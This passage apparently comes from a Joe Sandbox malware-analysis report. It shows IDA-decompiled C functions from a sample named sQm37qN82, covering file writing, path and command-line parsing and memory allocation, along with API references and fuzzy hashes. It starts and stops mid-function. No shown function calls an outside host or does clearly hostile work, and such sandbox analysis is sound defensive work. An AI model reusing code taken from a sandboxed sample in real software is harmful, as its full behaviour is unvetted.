                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 =  *0xde858c; // 0x268
                                                                                                                                                                                                        				_t9 = E00DE3680(_t20);
                                                                                                                                                                                                        				if( *0xde91d8 == 0) {
                                                                                                                                                                                                        					_push(_t24);
                                                                                                                                                                                                        					_t12 = WriteFile( *(0xde8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t25 = _a12;
                                                                                                                                                                                                        						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        							_t14 =  *0xde9400; // 0x50dc1
                                                                                                                                                                                                        							_t15 = _t14 + _t25;
                                                                                                                                                                                                        							 *0xde9400 = _t15;
                                                                                                                                                                                                        							if( *0xde8184 != 0) {
                                                                                                                                                                                                        								_t21 =  *0xde8584; // 0x0
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xde93f8, 0);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return _t9 | 0xffffffff;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00DE3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00DE369F
                                                                                                                                                                                                          • Part of subcall function 00DE3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE36B2
                                                                                                                                                                                                          • Part of subcall function 00DE3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00DE36DA
                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00DE4B05
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1084409-0
                                                                                                                                                                                                        • Opcode ID: 99805eb343a1ff8877cf98d789f53bc1f79ca25cce05d2abd48471948199e4dd
                                                                                                                                                                                                        • Instruction ID: 923e05493bbcd091a7e07fe5af948bc1a6ec5d2d902d766584408308cb872add
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99805eb343a1ff8877cf98d789f53bc1f79ca25cce05d2abd48471948199e4dd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5018031200381ABDB15AF6ADC95BA6775AF744725F088225F939DB2E0CB71D811CB70
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				intOrPtr _t4;
                                                                                                                                                                                                        				char* _t6;
                                                                                                                                                                                                        				char* _t8;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				char* _t16;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				char* _t19;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = __ecx;
                                                                                                                                                                                                        				_t10 = __edx;
                                                                                                                                                                                                        				_t17 = __ecx;
                                                                                                                                                                                                        				_t1 = _t17 + 1; // 0xde8b3f
                                                                                                                                                                                                        				_t12 = _t1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t4 =  *_t17;
                                                                                                                                                                                                        					_t17 = _t17 + 1;
                                                                                                                                                                                                        				} while (_t4 != 0);
                                                                                                                                                                                                        				_t18 = _t17 - _t12;
                                                                                                                                                                                                        				_t2 = _t18 + 1; // 0xde8b40
                                                                                                                                                                                                        				if(_t2 < __edx) {
                                                                                                                                                                                                        					_t19 = _t18 + __ecx;
                                                                                                                                                                                                        					if(_t19 > __ecx) {
                                                                                                                                                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                        						if( *_t8 != 0x5c) {
                                                                                                                                                                                                        							 *_t19 = 0x5c;
                                                                                                                                                                                                        							_t19 =  &(_t19[1]);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t6 = _a4;
                                                                                                                                                                                                        					 *_t19 = 0;
                                                                                                                                                                                                        					while( *_t6 == 0x20) {
                                                                                                                                                                                                        						_t6 = _t6 + 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return E00DE16B3(_t16, _t10, _t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0x8007007a;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(00DE8B3E,00DE8B3F,00000001,00DE8B3E,-00000003,?,00DE60EC,00DE1140,?), ref: 00DE65BA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharPrev
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 122130370-0
                                                                                                                                                                                                        • Opcode ID: 994b1fd8788816f6a547f0fc5a36095438ec51484d103c4f8a04ec885f1ea275
                                                                                                                                                                                                        • Instruction ID: 905e6d2f0c6168000ea702ba11fb7caf4d8b89b06bf3c8070436ea856c41b77a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 994b1fd8788816f6a547f0fc5a36095438ec51484d103c4f8a04ec885f1ea275
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78F02D323042D09BD331651F9884B67BFD99BA5390F18055EE8DAC3205CA65DC4583B0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00DE621E() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					0x4f0 = 2;
                                                                                                                                                                                                        					_t9 = E00DE597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00DE44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        					_t9 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00DE6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00DE623F
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DE4518
                                                                                                                                                                                                          • Part of subcall function 00DE44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00DE4554
                                                                                                                                                                                                          • Part of subcall function 00DE6285: GetLastError.KERNEL32(00DE5BBC), ref: 00DE6285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 381621628-0
                                                                                                                                                                                                        • Opcode ID: 68295d9e588e4263602d98d3dc68084673591872b8df9072af11aea14d7d82a6
                                                                                                                                                                                                        • Instruction ID: f7e9993097fad991132306b84c52861414f3a05753350179c6a85f43b8baa98d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 68295d9e588e4263602d98d3dc68084673591872b8df9072af11aea14d7d82a6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2F0E970700388ABD750FB759D42FBE77ACDB54340F400469BA89DB182DD74DD448674
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE4B60(signed int _a4) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 = _a4 * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t15 + 0xde8d64)) != 1) {
                                                                                                                                                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0xde8d74)); // executed
                                                                                                                                                                                                        					if(_t9 == 0) {
                                                                                                                                                                                                        						return _t9 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *((intOrPtr*)(_t15 + 0xde8d60)) = 1;
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xde8d60)) = 1;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xde8d68)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xde8d70)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xde8d6c)) = 0;
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00DE4FA1,00000000), ref: 00DE4B98
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        • Opcode ID: e1dac731edfcb92c7f53e64378675f95dc028ce34f0acbf6368e868d73ea35ab
                                                                                                                                                                                                        • Instruction ID: 50b4bde73f4bbb687ec06b5b9affb19827b0c38d8da7fbcf90b47a97acbdacf2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1dac731edfcb92c7f53e64378675f95dc028ce34f0acbf6368e868d73ea35ab
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10F01231900B889E4771FF3ACC00652BBECBA953603500A2ED4AFD2190DB32A451FBB1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE66AE(CHAR* __ecx) {
                                                                                                                                                                                                        				unsigned int _t1;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                        				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,00DE4777,?,00DE4E38,?), ref: 00DE66B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                        • Opcode ID: 152dfc9e31b1231cc61db06b037e3308a5e8f9910d3e5e448df7f8842f4cfe3c
                                                                                                                                                                                                        • Instruction ID: 6f5a640ea81d55c393d2077ef5dad7edc68363c08c287bac8b182ff216702979
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 152dfc9e31b1231cc61db06b037e3308a5e8f9910d3e5e448df7f8842f4cfe3c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3FB09276232581426A2026366C695562841A6D123A7E92B94F032C02E4CA3ED946D024
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE4CA0(long _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x00de4caa
                                                                                                                                                                                                        0x00de4cb1

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 00DE4CAA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3761449716-0
                                                                                                                                                                                                        • Opcode ID: fda2e70ee709f66328f839b2bf0abb5ae9b99d6333362894f7d0f3302c813a09
                                                                                                                                                                                                        • Instruction ID: f5835039929c39bf9d83a641ac661dab21c90e5c032e0549fa95714109f89082
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fda2e70ee709f66328f839b2bf0abb5ae9b99d6333362894f7d0f3302c813a09
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08B0123304434CB7CF002FC6EC09F853F1DE7C4761F150000F60C8D1508A72A51086A6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE4CC0(void* _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x00de4cc8
                                                                                                                                                                                                        0x00de4ccf

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2979337801-0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00DE5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				CHAR* _v265;
                                                                                                                                                                                                        				char _v266;
                                                                                                                                                                                                        				char _v267;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				CHAR* _v272;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				signed int _v296;
                                                                                                                                                                                                        				char _v556;
                                                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				CHAR* _t69;
                                                                                                                                                                                                        				signed int _t71;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				char _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				intOrPtr _t88;
                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                                                                        				void* _t111;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				void* _t119;
                                                                                                                                                                                                        				void* _t127;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                                        				void* _t142;
                                                                                                                                                                                                        				signed int _t143;
                                                                                                                                                                                                        				CHAR* _t144;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                                        				void* _t147;
                                                                                                                                                                                                        				void* _t149;
                                                                                                                                                                                                        				char _t155;
                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                        				void* _t162;
                                                                                                                                                                                                        				void* _t163;
                                                                                                                                                                                                        				char _t167;
                                                                                                                                                                                                        				char _t170;
                                                                                                                                                                                                        				CHAR* _t173;
                                                                                                                                                                                                        				void* _t177;
                                                                                                                                                                                                        				intOrPtr* _t183;
                                                                                                                                                                                                        				intOrPtr* _t192;
                                                                                                                                                                                                        				CHAR* _t199;
                                                                                                                                                                                                        				void* _t200;
                                                                                                                                                                                                        				CHAR* _t201;
                                                                                                                                                                                                        				void* _t205;
                                                                                                                                                                                                        				void* _t206;
                                                                                                                                                                                                        				int _t209;
                                                                                                                                                                                                        				void* _t210;
                                                                                                                                                                                                        				void* _t212;
                                                                                                                                                                                                        				void* _t213;
                                                                                                                                                                                                        				CHAR* _t218;
                                                                                                                                                                                                        				intOrPtr* _t219;
                                                                                                                                                                                                        				intOrPtr* _t220;
                                                                                                                                                                                                        				signed int _t221;
                                                                                                                                                                                                        				signed int _t223;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t173 = __ecx;
                                                                                                                                                                                                        				_t61 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                        				_push(__ebx);
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_push(__edi);
                                                                                                                                                                                                        				_t209 = 1;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                        					_t63 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					while(_t209 != 0) {
                                                                                                                                                                                                        						_t67 =  *_t173;
                                                                                                                                                                                                        						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                        							_t173 = CharNextA(_t173);
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v272 = _t173;
                                                                                                                                                                                                        						if(_t67 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t69 = _v272;
                                                                                                                                                                                                        							_t177 = 0;
                                                                                                                                                                                                        							_t213 = 0;
                                                                                                                                                                                                        							_t163 = 0;
                                                                                                                                                                                                        							_t202 = 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								if(_t213 != 0) {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L21;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t69 =  *_t69;
                                                                                                                                                                                                        									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t69 = _v272;
                                                                                                                                                                                                        										L21:
                                                                                                                                                                                                        										_t155 =  *_t69;
                                                                                                                                                                                                        										if(_t155 != 0x22) {
                                                                                                                                                                                                        											if(_t202 >= 0x104) {
                                                                                                                                                                                                        												goto L106;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                        												_t177 = _t177 + 1;
                                                                                                                                                                                                        												_t202 = _t202 + 1;
                                                                                                                                                                                                        												_t157 = 1;
                                                                                                                                                                                                        												goto L30;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											if(_v272[1] == 0x22) {
                                                                                                                                                                                                        												if(_t202 >= 0x104) {
                                                                                                                                                                                                        													L106:
                                                                                                                                                                                                        													_t63 = 0;
                                                                                                                                                                                                        													L125:
                                                                                                                                                                                                        													_pop(_t210);
                                                                                                                                                                                                        													_pop(_t212);
                                                                                                                                                                                                        													_pop(_t162);
                                                                                                                                                                                                        													return E00DE6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                        													_t177 = _t177 + 1;
                                                                                                                                                                                                        													_t202 = _t202 + 1;
                                                                                                                                                                                                        													_t157 = 2;
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t157 = 1;
                                                                                                                                                                                                        												if(_t213 != 0) {
                                                                                                                                                                                                        													_t163 = 1;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t213 = 1;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L30;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L131;
                                                                                                                                                                                                        								L30:
                                                                                                                                                                                                        								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                        								_t69 = _v272;
                                                                                                                                                                                                        							} while ( *_t69 != 0);
                                                                                                                                                                                                        							if(_t177 >= 0x104) {
                                                                                                                                                                                                        								E00DE6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                        								asm("int3");
                                                                                                                                                                                                        								_push(_t221);
                                                                                                                                                                                                        								_t222 = _t223;
                                                                                                                                                                                                        								_t71 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                        								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                        									0x4f0 = 2;
                                                                                                                                                                                                        									_t75 = E00DE597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00DE44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                        									 *0xde9124 = E00DE6285();
                                                                                                                                                                                                        									_t75 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								return E00DE6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                        								if(_t213 == 0) {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										goto L34;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L40;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										_t79 = _v268;
                                                                                                                                                                                                        										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                        											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                        											if(_t83 == 0) {
                                                                                                                                                                                                        												_t202 = 0x521;
                                                                                                                                                                                                        												E00DE44B9(0, 0x521, 0xde1140, 0, 0x40, 0);
                                                                                                                                                                                                        												_t85 =  *0xde8588; // 0x0
                                                                                                                                                                                                        												if(_t85 != 0) {
                                                                                                                                                                                                        													CloseHandle(_t85);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												ExitProcess(0);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t87 = _t83 - 4;
                                                                                                                                                                                                        											if(_t87 == 0) {
                                                                                                                                                                                                        												if(_v266 != 0) {
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                        														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                        														_t50 = _t183 + 1; // 0x1
